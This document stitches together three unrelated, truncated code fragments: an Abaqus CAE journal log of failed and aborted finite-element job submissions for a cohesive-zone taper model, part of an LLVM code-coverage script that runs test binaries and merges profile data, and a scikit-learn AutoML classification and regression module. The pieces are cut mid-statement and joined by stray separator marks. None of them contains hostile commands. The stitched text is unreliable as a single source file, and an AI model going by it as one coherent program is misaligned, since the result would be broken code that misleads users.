mdb.models['Model-1'].parts['Part-2'].sectionAssignments[1].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#a0c01 ]', ), )))
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[2].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#205000 ]', ), )))
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[6].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#200 ]', ), )))
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[7].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#70 ]', ), )))
mdb.models['Model-1'].parts['Part-2'].sectionAssignments[8].setValues(region=
Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#8 ]', ), )))
# Save by banerjee on Tue Oct 18 16:46:35 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': 'in keyword *DAMAGESTABILIZATION, file "OneTaper3D.inp", line 44524: The keyword is misplaced. It can be suboption for the following keyword(s)/level(s): damageevolution',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ABORTED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase failed due to errors', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_ABORTED, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.models['Model-1'].parts['Part-2'].setElementType(elemTypes=(ElemType(
elemCode=COH3D8, elemLibrary=STANDARD), ElemType(elemCode=COH3D6,
elemLibrary=STANDARD), ElemType(elemCode=UNKNOWN_TET,
elemLibrary=STANDARD)), regions=(
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#40142 ]', ), ), ))
mdb.models['Model-1'].parts['Part-2'].setElementType(elemTypes=(ElemType(
elemCode=COH3D8, elemLibrary=STANDARD), ElemType(elemCode=COH3D6,
elemLibrary=STANDARD), ElemType(elemCode=UNKNOWN_TET,
elemLibrary=STANDARD)), regions=(
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#a0 ]',
), ), ))
mdb.models['Model-1'].parts['Part-2'].setElementType(elemTypes=(ElemType(
elemCode=COH3D8, elemLibrary=STANDARD), ElemType(elemCode=COH3D6,
elemLibrary=STANDARD), ElemType(elemCode=UNKNOWN_TET,
elemLibrary=STANDARD)), regions=(
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#210 ]',
), ), ))
del mdb.models['Model-1'].materials['CohesiveMatFaceFace'].quadeDamageInitiation
mdb.models['Model-1'].materials['CohesiveMatFaceFace'].elastic.setValues(table=
((6900000000000.0, 6900000000000.0, 6900000000000.0), ), type=TRACTION)
mdb.models['Model-1'].materials['CohesiveMatFaceFace'].MaxsDamageInitiation(
table=((60000000.0, 50000000.0, 50000000.0), ))
mdb.models['Model-1'].materials['CohesiveMatFaceFace'].maxsDamageInitiation.DamageEvolution(
table=((0.001, ), ), type=DISPLACEMENT)
mdb.meshEditOptions.setValues(enableUndo=True, maxUndoCacheElements=0.5)
# Save by banerjee on Tue Oct 18 17:03:02 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': 'in keyword *ELEMENTOUTPUT, file "OneTaper3D.inp", line 44573: Unknown assembly set _PICKEDSET27',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': 'ERROR INDICATOR OUTPUT HAS BEEN SPECIFIED ON ELSET ASSEMBLY__PICKEDSET27 BUT THIS ELSET HAS NOT BEEN DEFINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ABORTED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase failed due to errors', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_ABORTED, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
del mdb.models['Model-1'].remeshingRules['RemeshingRule-1']
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF, datacheckJob=True)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': '12 elements have missing property definitions. The elements have been identified in element set ErrElemMissingSection.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '12 elements have incorrect property definitions. The elements have been identified in element set WarnElemIncorrectProperty.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': BATCHPRE_PHASE,
'message': 'SECTION DEFINITIONS ARE MISSING OR INCORRECT FOR THE ELEMENTS INDICATED ABOVE. FURTHER PROCESSING OF THE INPUT FILE IS NOT POSSIBLE UNTIL THIS INPUT ERROR IS FIXED.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ABORTED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase failed due to errors', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_ABORTED, {
'message': 'Analysis Input File Processor exited with an error.',
'jobName': 'OneTaper3D'})
mdb.models['Model-1'].rootAssembly.unlock()
mdb.models['Model-1'].rootAssembly.regenerate()
mdb.models['Model-1'].rootAssembly.makeIndependent(instances=(
mdb.models['Model-1'].rootAssembly.instances['Part-2-1'], ))
mdb.models['Model-1'].rootAssembly.setElementType(elemTypes=(ElemType(
elemCode=COH3D8, elemLibrary=STANDARD), ElemType(elemCode=COH3D6,
elemLibrary=STANDARD), ElemType(elemCode=UNKNOWN_TET,
elemLibrary=STANDARD)), regions=(
mdb.models['Model-1'].rootAssembly.instances['Part-2-1'].cells.getSequenceFromMask(
('[#8 ]', ), ), ))
mdb.models['Model-1'].parts['Part-2'].SectionAssignment(offset=0.0,
offsetField='', offsetType=MIDDLE_SURFACE, region=Region(
cells=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(
mask=('[#8 ]', ), )), sectionName='CohesiveSectionFaceFace',
thicknessAssignment=FROM_SECTION)
mdb.models['Model-1'].rootAssembly.regenerate()
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF, datacheckJob=True)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 4 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 5 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '24 elements are distorted. Either the isoparametric angles are out of the suggested limits or the triangular or tetrahedral quality measure is bad. The elements have been identified in element set WarnElemDistorted.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'Solver problem. Numerical singularity at D.O.F. 2 at one or more of the internal nodes of 10 elements. The elements have been identified in element set WarnElemSolvProbNumSing_2_0_0_0_0.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FILE, {'phase': BATCHPRE_PHASE,
'file': '/home2/banerjee/Abaqus/AdvComp/OneTaper3DCZM/OneTaper3D.odb',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': STANDARD_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STEP, {'phase': STANDARD_PHASE, 'stepId': 1,
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'The executable /home/Abaqus/6.10-1/exec/standard.exe aborted with system error "Illegal floating point operation" (signal 8). Please check the .dat, .msg, and .sta files for error messages if the files exist. If there are no error messages and you cannot resolve the problem, please run the command "abaqus job=support information=support" to report and save your system information. Use the same command to run Abaqus that you used when the problem occurred. Please contact your local Abaqus support office and send them the input | |
command, output_file_path)
profraw_file_paths = []
if _IsIOS():
profraw_file_paths = [_GetProfrawDataFileByParsingOutput(output)]
elif _IsAndroid():
android_coverage_dir = os.path.join(BUILD_DIR, 'coverage')
for r, _, files in os.walk(android_coverage_dir):
for f in files:
if f.endswith(PROFRAW_FILE_EXTENSION):
profraw_file_paths.append(os.path.join(r, f))
else:
for file_or_dir in os.listdir(report_root_dir):
if file_or_dir.endswith(PROFRAW_FILE_EXTENSION):
profraw_file_paths.append(
os.path.join(report_root_dir, file_or_dir))
assert profraw_file_paths, (
'Running target "%s" failed to generate any profraw data file, '
'please make sure the binary exists, is properly instrumented and '
'does not crash. %s' % (target, FILE_BUG_MESSAGE))
assert isinstance(profraw_file_paths, list), (
'Variable \'profraw_file_paths\' is expected to be of type \'list\', '
'but it is a %s. %s' % (type(profraw_file_paths), FILE_BUG_MESSAGE))
try:
profdata_file_path = _CreateTargetProfDataFileFromProfRawFiles(
target, profraw_file_paths)
break
except Exception:
logging.info('Retrying...')
finally:
# Remove profraw files now so that they are not used in next iteration.
for profraw_file_path in profraw_file_paths:
os.remove(profraw_file_path)
assert profdata_file_path, (
'Failed to merge target "%s" profraw files after %d retries. %s' %
(target, MERGE_RETRIES, FILE_BUG_MESSAGE))
profdata_file_paths.append(profdata_file_path)
logging.debug('Finished executing the test commands.')
return profdata_file_paths
def _GetEnvironmentVars(profraw_file_path):
"""Return environment vars for subprocess, given a profraw file path."""
env = os.environ.copy()
env.update({
'LLVM_PROFILE_FILE': profraw_file_path,
'PATH': _GetPathWithLLVMSymbolizerDir()
})
return env
def _SplitCommand(command):
"""Split a command string into parts in a platform-specific way."""
if coverage_utils.GetHostPlatform() == 'win':
return command.split()
return shlex.split(command)
def _ExecuteCommand(target, command, output_file_path):
"""Runs a single command and generates a profraw data file."""
# Per Clang "Source-based Code Coverage" doc:
#
# "%p" expands out to the process ID. It's not used by this scripts due to:
# 1) If a target program spawns too many processess, it may exhaust all disk
# space available. For example, unit_tests writes thousands of .profraw
# files each of size 1GB+.
# 2) If a target binary uses shared libraries, coverage profile data for them
# will be missing, resulting in incomplete coverage reports.
#
# "%Nm" expands out to the instrumented binary's signature. When this pattern
# is specified, the runtime creates a pool of N raw profiles which are used
# for on-line profile merging. The runtime takes care of selecting a raw
# profile from the pool, locking it, and updating it before the program exits.
# N must be between 1 and 9. The merge pool specifier can only occur once per
# filename pattern.
#
# "%1m" is used when tests run in single process, such as fuzz targets.
#
# For other cases, "%4m" is chosen as it creates some level of parallelism,
# but it's not too big to consume too much computing resource or disk space.
profile_pattern_string = '%1m' if _IsFuzzerTarget(target) else '%4m'
expected_profraw_file_name = os.extsep.join(
[target, profile_pattern_string, PROFRAW_FILE_EXTENSION])
expected_profraw_file_path = os.path.join(
coverage_utils.GetCoverageReportRootDirPath(OUTPUT_DIR),
expected_profraw_file_name)
command = command.replace(LLVM_PROFILE_FILE_PATH_SUBSTITUTION,
expected_profraw_file_path)
try:
# Some fuzz targets or tests may write into stderr, redirect it as well.
with open(output_file_path, 'wb') as output_file_handle:
subprocess.check_call(_SplitCommand(command),
stdout=output_file_handle,
stderr=subprocess.STDOUT,
env=_GetEnvironmentVars(expected_profraw_file_path))
except subprocess.CalledProcessError as e:
logging.warning('Command: "%s" exited with non-zero return code.', command)
return open(output_file_path, 'rb').read()
def _IsFuzzerTarget(target):
"""Returns true if the target is a fuzzer target."""
build_args = _GetBuildArgs()
use_libfuzzer = ('use_libfuzzer' in build_args and
build_args['use_libfuzzer'] == 'true')
return use_libfuzzer and target.endswith('_fuzzer')
def _ExecuteIOSCommand(command, output_file_path):
"""Runs a single iOS command and generates a profraw data file.
iOS application doesn't have write access to folders outside of the app, so
it's impossible to instruct the app to flush the profraw data file to the
desired location. The profraw data file will be generated somewhere within the
application's Documents folder, and the full path can be obtained by parsing
the output.
"""
assert _IsIOSCommand(command)
# After running tests, iossim generates a profraw data file, it won't be
# needed anyway, so dump it into the OUTPUT_DIR to avoid polluting the
# checkout.
iossim_profraw_file_path = os.path.join(
OUTPUT_DIR, os.extsep.join(['iossim', PROFRAW_FILE_EXTENSION]))
command = command.replace(LLVM_PROFILE_FILE_PATH_SUBSTITUTION,
iossim_profraw_file_path)
try:
with open(output_file_path, 'wb') as output_file_handle:
subprocess.check_call(_SplitCommand(command),
stdout=output_file_handle,
stderr=subprocess.STDOUT,
env=_GetEnvironmentVars(iossim_profraw_file_path))
except subprocess.CalledProcessError as e:
# iossim emits non-zero return code even if tests run successfully, so
# ignore the return code.
pass
return open(output_file_path, 'rb').read()
def _GetProfrawDataFileByParsingOutput(output):
"""Returns the path to the profraw data file obtained by parsing the output.
The output of running the test target has no format, but it is guaranteed to
have a single line containing the path to the generated profraw data file.
NOTE: This should only be called when target os is iOS.
"""
assert _IsIOS()
output_by_lines = ''.join(output).splitlines()
profraw_file_pattern = re.compile('.*Coverage data at (.*coverage\.profraw).')
for line in output_by_lines:
result = profraw_file_pattern.match(line)
if result:
return result.group(1)
assert False, ('No profraw data file was generated, did you call '
'coverage_util::ConfigureCoverageReportPath() in test setup? '
'Please refer to base/test/test_support_ios.mm for example.')
def _CreateCoverageProfileDataFromTargetProfDataFiles(profdata_file_paths):
"""Returns a relative path to coverage profdata file by merging target
profdata files.
Args:
profdata_file_paths: A list of relative paths to the profdata data files
that are to be merged.
Returns:
A relative path to the merged coverage profdata file.
Raises:
CalledProcessError: An error occurred merging profdata files.
"""
logging.info('Creating the coverage profile data file.')
logging.debug('Merging target profraw files to create target profdata file.')
profdata_file_path = _GetProfdataFilePath()
try:
subprocess_cmd = [
LLVM_PROFDATA_PATH, 'merge', '-o', profdata_file_path, '-sparse=true'
]
subprocess_cmd.extend(profdata_file_paths)
output = subprocess.check_output(subprocess_cmd)
logging.debug('Merge output: %s', output)
except subprocess.CalledProcessError as error:
logging.error(
'Failed to merge target profdata files to create coverage profdata. %s',
FILE_BUG_MESSAGE)
raise error
logging.debug('Finished merging target profdata files.')
logging.info('Code coverage profile data is created as: "%s".',
profdata_file_path)
return profdata_file_path
def _CreateTargetProfDataFileFromProfRawFiles(target, profraw_file_paths):
"""Returns a relative path to target profdata file by merging target
profraw files.
Args:
profraw_file_paths: A list of relative paths to the profdata data files
that are to be merged.
Returns:
A relative path to the merged coverage profdata file.
Raises:
CalledProcessError: An error occurred merging profdata files.
"""
logging.info('Creating target profile data file.')
logging.debug('Merging target profraw files to create target profdata file.')
profdata_file_path = os.path.join(OUTPUT_DIR, '%s.profdata' % target)
try:
subprocess_cmd = [
LLVM_PROFDATA_PATH, 'merge', '-o', profdata_file_path, '-sparse=true'
]
subprocess_cmd.extend(profraw_file_paths)
output = subprocess.check_output(subprocess_cmd)
logging.debug('Merge output: %s', output)
except subprocess.CalledProcessError as error:
logging.error(
'Failed to merge target profraw files to create target profdata.')
raise error
logging.debug('Finished merging target profraw files.')
logging.info('Target "%s" profile data is created as: "%s".', target,
profdata_file_path)
return profdata_file_path
def _GeneratePerFileCoverageSummary(binary_paths, profdata_file_path, filters,
ignore_filename_regex):
"""Generates per file coverage summary using "llvm-cov export" command."""
# llvm-cov export [options] -instr-profile PROFILE BIN [-object BIN,...]
# [[-object BIN]] [SOURCES].
# NOTE: For object files, the first one is specified as a positional argument,
# and the rest are specified as keyword argument.
logging.debug('Generating per-file code coverage summary using "llvm-cov '
'export -summary-only" command.')
for path in binary_paths:
if not os.path.exists(path):
logging.error("Binary %s does not exist", path)
subprocess_cmd = [
LLVM_COV_PATH, 'export', '-summary-only',
'-instr-profile=' + profdata_file_path, binary_paths[0]
]
subprocess_cmd.extend(
['-object=' + binary_path for binary_path in binary_paths[1:]])
_AddArchArgumentForIOSIfNeeded(subprocess_cmd, len(binary_paths))
subprocess_cmd.extend(filters)
if ignore_filename_regex:
subprocess_cmd.append('-ignore-filename-regex=%s' % ignore_filename_regex)
export_output = subprocess.check_output(subprocess_cmd)
# Write output on the disk to be used by code coverage bot.
with open(_GetSummaryFilePath(), 'w') as f:
f.write(export_output)
return export_output
def _AddArchArgumentForIOSIfNeeded(cmd_list, num_archs):
"""Appends -arch arguments to the command list if it's ios platform.
iOS binaries are universal binaries, and require specifying the architecture
to use, and one architecture needs to be specified for each binary.
"""
if _IsIOS():
cmd_list.extend(['-arch=x86_64'] * num_archs)
def _GetBinaryPath(command):
"""Returns a relative path to the binary to be run by the command.
Currently, following types of commands are supported (e.g. url_unittests):
1. Run test binary direcly: "out/coverage/url_unittests <arguments>"
2. Use xvfb.
2.1. "python testing/xvfb.py out/coverage/url_unittests <arguments>"
2.2. "testing/xvfb.py out/coverage/url_unittests <arguments>"
3. Use iossim to run tests on iOS platform, please refer to testing/iossim.mm
for its usage.
3.1. "out/Coverage-iphonesimulator/iossim
<iossim_arguments> -c <app_arguments>
out/Coverage-iphonesimulator/url_unittests.app"
Args:
command: A command used to run a target.
Returns:
A relative path to the binary.
"""
xvfb_script_name = os.extsep.join(['xvfb', 'py'])
command_parts = _SplitCommand(command)
if os.path.basename(command_parts[0]) == 'python':
assert os.path.basename(command_parts[1]) == xvfb_script_name, (
'This tool doesn\'t understand the command: "%s".' % command)
return command_parts[2]
if os.path.basename(command_parts[0]) == xvfb_script_name:
return command_parts[1]
if _IsIOSCommand(command):
# For a given application bundle, the binary resides in the bundle and has
# the same name with the application without the .app | |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import statsmodels.api as sm
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer, make_column_selector
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler, OneHotEncoder
from sklearn.feature_selection import SelectKBest, f_classif
from sklearn.model_selection import RandomizedSearchCV
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LinearRegression, Lasso, Ridge, ElasticNet
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.neighbors import KNeighborsClassifier, NearestNeighbors
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import LinearSVC, SVR
from xgboost import XGBClassifier, XGBRegressor
from sklearn.cluster import KMeans, DBSCAN
from sklearn.decomposition import PCA
from sklearn.metrics import balanced_accuracy_score, classification_report, plot_confusion_matrix
from sklearn.metrics import mean_absolute_error, silhouette_score
class AutoML_Classifier:
'''
AutoML algorithm for classification.
Args:
scoring_func - parameters of the estimated metric (default = balanced_accuracy)
n_iter - the number of iterations of parameters search (default = 50)
random_state - a random_state parameter (default = 0)
cv - a number of cross_validation repeats (default = 5).
Set False for those algorithms you don't want to use.
'''
def __init__(self, scoring_func='balanced_accuracy',
n_iter=50, random_state=0, cv=5,
LogisticRegression=True, KNN=True,
DecisionTree=True, RandomForest=True,
LinearSVC=True, GradientBoosting=True,
XGB=True):
self.scoring_func = scoring_func
self.n_iter = n_iter
self.random_state = random_state
self.cv = cv
self.LogisticRegression = LogisticRegression
self.KNN = KNN
self.DecisionTree = DecisionTree
self.RandomForest = RandomForest
self.LinearSVC = LinearSVC
self.GradientBoosting = GradientBoosting
self.XGB = XGB
def fit(self, X, y):
'''
Args:
X - a data frame with predictors
y - predicted variable.
It selects an optimal machine learning algorithm and performs all
the data preprocessing necessary for this algorithm.
Return:
best_estimator_
best_params_ required for prediction,
detailed cv results.
'''
X_train = X
y_train = y
# All unique cat values
cat_val = []
cat_subset = X_train.select_dtypes(include = ['object', 'category', 'bool'])
for i in cat_subset.columns:
cat_val.append(list(cat_subset[i].dropna().unique()))
# Preprocessing
cat_pipeline = Pipeline([('cleaner', SimpleImputer(strategy = 'most_frequent')),
('encoder', OneHotEncoder(sparse = False, categories = cat_val))])
num_pipeline = Pipeline([('cleaner', SimpleImputer()),
('scaler', StandardScaler())])
preprocessor = ColumnTransformer([
('numerical', num_pipeline, make_column_selector(dtype_exclude = ['object', 'category', 'bool'])),
('categorical', cat_pipeline, make_column_selector(dtype_include = ['object', 'category', 'bool']))
])
# Main pipeline
model_pipeline_steps = []
model_pipeline_steps.append(('preprocessor', preprocessor))
model_pipeline_steps.append(('feature_selector', SelectKBest(f_classif, k = 'all')))
model_pipeline_steps.append(('estimator', LogisticRegression()))
model_pipeline = Pipeline(model_pipeline_steps)
total_features = preprocessor.fit_transform(X_train).shape[1]
optimization_grid = []
# ALGORITHMS SELECTION
# Logistic regression
if self.LogisticRegression == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [LogisticRegression()]
})
# K-nearest neighbors
if self.KNN == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [KNeighborsClassifier()],
'estimator__weights': ['uniform', 'distance'],
'estimator__n_neighbors': np.arange(1, 20, 1)
})
# Decision tree
if self.DecisionTree == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [None],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [DecisionTreeClassifier(random_state = self.random_state)],
'estimator__criterion': ['gini', 'entropy']
})
# Random Forest
if self.RandomForest == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [None],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [RandomForestClassifier(random_state = self.random_state)],
'estimator__n_estimators': np.arange(5, 1000, 20),
'estimator__criterion': ['gini', 'entropy']
})
# Linear SVM
if self.LinearSVC == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean','median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [LinearSVC(random_state = self.random_state)],
'estimator__C': np.arange(0.1, 1.1, 0.1),
})
# Gradient boosting
if self.GradientBoosting == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [None],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [GradientBoostingClassifier(random_state = self.random_state)],
'estimator__n_estimators': np.arange(5, 1000, 20),
'estimator__learning_rate': np.linspace(0.01, 1.0, 30),
})
# XGBoost
if self.XGB == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [None],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [XGBClassifier(random_state = self.random_state)],
'estimator__n_estimators': np.arange(5, 1000, 20),
'estimator__learning_rate': np.linspace(0.01, 1.0, 30),
})
# Search the best estimator
search = RandomizedSearchCV(
model_pipeline,
optimization_grid,
n_iter = self.n_iter,
scoring = self.scoring_func,
n_jobs = -1,
random_state = self.random_state,
verbose = 1,
cv = self.cv,
return_train_score = True)
search.fit(X_train, y_train)
self.best_estimator_ = search.best_estimator_
self.best_pipeline = search.best_params_
self.cv_results_ = search.cv_results_
best_alg = str(self.best_pipeline['estimator']).split('(')[0]
print('{} was used as the best algorithm!'.format(best_alg))
def predict(self, X, save=False, f_format='excel'):
'''
Class prediction based on trained AutoML model.
Args:
X - a data frame with test data
save - save prediction in local directory or not
f_format - format of data saving (if save = True): 'csv' or 'excel' (default)
Return:
the numeric classes.
'''
assert f_format in {'excel', 'csv'}
preds = pd.DataFrame(self.best_estimator_.predict(X))
if save == True and f_format == 'csv':
preds.to_csv('preds.csv')
elif save == True and f_format == 'excel':
preds.to_excel('preds.xlsx', sheet_name = 'preds')
else:
pass
return self.best_estimator_.predict(X)
def predict_proba(self, X, save=False, f_format='excel'):
'''
Class prediction based on trained AutoML model.
Args:
X - a data frame with test data
save - save prediction in local directory or not
f_format - format of data saving (if save = True): 'csv' or 'excel' (default)
Return:
the probabilities of classes.
'''
assert f_format in {'excel', 'csv'}
preds = pd.DataFrame(self.best_estimator_.predict_proba(X))
if save == True and f_format == 'csv':
preds.to_csv('preds.csv')
elif save == True and f_format == 'excel':
preds.to_excel('preds.xlsx', sheet_name = 'preds')
else:
pass
return self.best_estimator_.predict_proba(X)
def classification_report(self, X, y, labels=None, cmap='inferno',
save=False):
'''
Prediction classification report.
Args:
X - a data frame with predictors
y - predicted variable.
labels - a list of labels
cmap - color map
save - whether to save the output plot in local directory or not
Return:
plots
classification_report
'''
report = classification_report(y, self.best_estimator_.predict(X),
target_names = labels)
plot_confusion_matrix(self.best_estimator_, X, y,
display_labels = labels, cmap = cmap)
if save == True:
plt.savefig('Preds_Heatmap.png', dpi = 200)
plt.show()
return print(report)
class AutoML_Regressor:
'''
AutoML algorithm for regression.
Args:
scoring_func - parameters of the estimated metric (default = neg_mean_squared_error)
n_iter - the number of iterations of parameters search (default = 50)
random_state - a random_state parameter (default = 0)
cv - a number of cross_validation repeats (default = 5).
Set False for those algorithms you don't want to use.
'''
def __init__(self, scoring_func='neg_mean_squared_error',
n_iter=50, random_state=0, cv=5,
LinearRegression=True, Lasso=True,
Ridge=True, ElasticNet=True,
RandomForest=True, SVR=True,
GradientBoosting=True, XGB=True):
self.scoring_func = scoring_func
self.n_iter = n_iter
self.random_state = random_state
self.cv = cv
self.LinearRegression = LinearRegression
self.Lasso = Lasso
self.Ridge = Ridge
self.ElasticNet = ElasticNet
self.SVR = SVR
self.RandomForest = RandomForest
self.GradientBoosting = GradientBoosting
self.XGB = XGB
def fit(self, X, y):
'''
Args:
X - a data frame with predictors
y - predicted variable.
It selects an optimal machine learning algorithm and performs all
the data preprocessing necessary for this algorithm.
Return:
best_estimator_
best_params_ required for prediction,
detailed cv results.
'''
X_train = X
y_train = y
# All unique cat values
cat_val = []
cat_subset = X_train.select_dtypes(include = ['object', 'category', 'bool'])
for i in cat_subset.columns:
cat_val.append(list(cat_subset[i].dropna().unique()))
if len(cat_val) > 0:
print('The data has categorical predictors: {}'.format(cat_subset.columns))
# Preprocessing
cat_pipeline = Pipeline([('cleaner', SimpleImputer(strategy = 'most_frequent')),
('encoder', OneHotEncoder(sparse = False, categories = cat_val))])
num_pipeline = Pipeline([('cleaner', SimpleImputer()),
('scaler', StandardScaler())])
preprocessor = ColumnTransformer([
('numerical', num_pipeline, make_column_selector(dtype_exclude = ['object', 'category', 'bool'])),
('categorical', cat_pipeline, make_column_selector(dtype_include = ['object', 'category', 'bool']))
])
# Main pipeline
model_pipeline_steps = []
model_pipeline_steps.append(('preprocessor', preprocessor))
model_pipeline_steps.append(('feature_selector', SelectKBest(f_classif, k = 'all')))
model_pipeline_steps.append(('estimator', LinearRegression()))
model_pipeline = Pipeline(model_pipeline_steps)
total_features = preprocessor.fit_transform(X_train).shape[1]
optimization_grid = []
# ALGORITHMS SELECTION
# Linear Regression
if self.LinearRegression == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [LinearRegression()],
})
# Lasso (L1)
if self.Lasso == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [Lasso(random_state = self.random_state)],
'estimator__alpha': np.arange(0.001, 1.01, 0.05),
})
# Ridge (L2)
